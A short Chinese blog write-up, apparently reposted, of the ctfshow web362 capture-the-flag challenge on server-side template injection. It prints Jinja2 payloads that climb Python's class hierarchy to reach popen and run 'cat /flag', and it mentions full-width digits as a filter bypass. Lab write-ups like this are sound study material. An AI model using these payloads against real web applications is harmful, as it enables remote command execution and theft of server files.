热门标签
热门文章
- 1STM32F103如何实现 FFT?_用stm32f103实现fft变换历程
- 2【学习教程系列】最通俗的 Python3 网络爬虫入门_python3爬虫
- 3【微服务】RPC的实现原理_rpc怎么实现
- 4超详细的SQL Server语句大全_sql server语言范例参考
- 5从SQL注入绕过最新安全狗WAF中学习fuzz_sqlmap写shell绕过安全狗
- 6K8s --The connection to the server 192.168.56.120:6443 was refused报错解决_the connection to the server 192.168.56.111:6443 w
- 7android studio 生成aar包并在其他工程引用 (导入)aar包_aar 引用
- 8Leetcode刷题之回文链表和交换链表中的结点
- 9Stable Diffusion 4.8.7升级版更新,Ai绘画风口已来!(无需部署,解压即用)_stablediffusion4.8
- 10使用Postman搞定各种接口token实战_postman和token
当前位置: article > 正文
ctfshow-web362(SSTI)
作者:笔触狂放9 | 2024-08-05 05:33:11
赞
踩
web362
?name={{"".__class__.__bases__[0].__subclasses__()}} 一直到这一步都是正常的
从12开始就没用了
数字出现了问题,看wp用全角数字代替正常数字绕过
?name={{"".__class__.__bases__[0].__subclasses__()[132]}}
然后应该可以用正常方法做了
?name={{"".__class__.__bases__[0].__subclasses__()[132].__init__.__globals__['popen']('cat /flag').read()}}
声明:本文内容由网友自发贡献,转载请注明出处:【wpsshop】
推荐阅读
相关标签
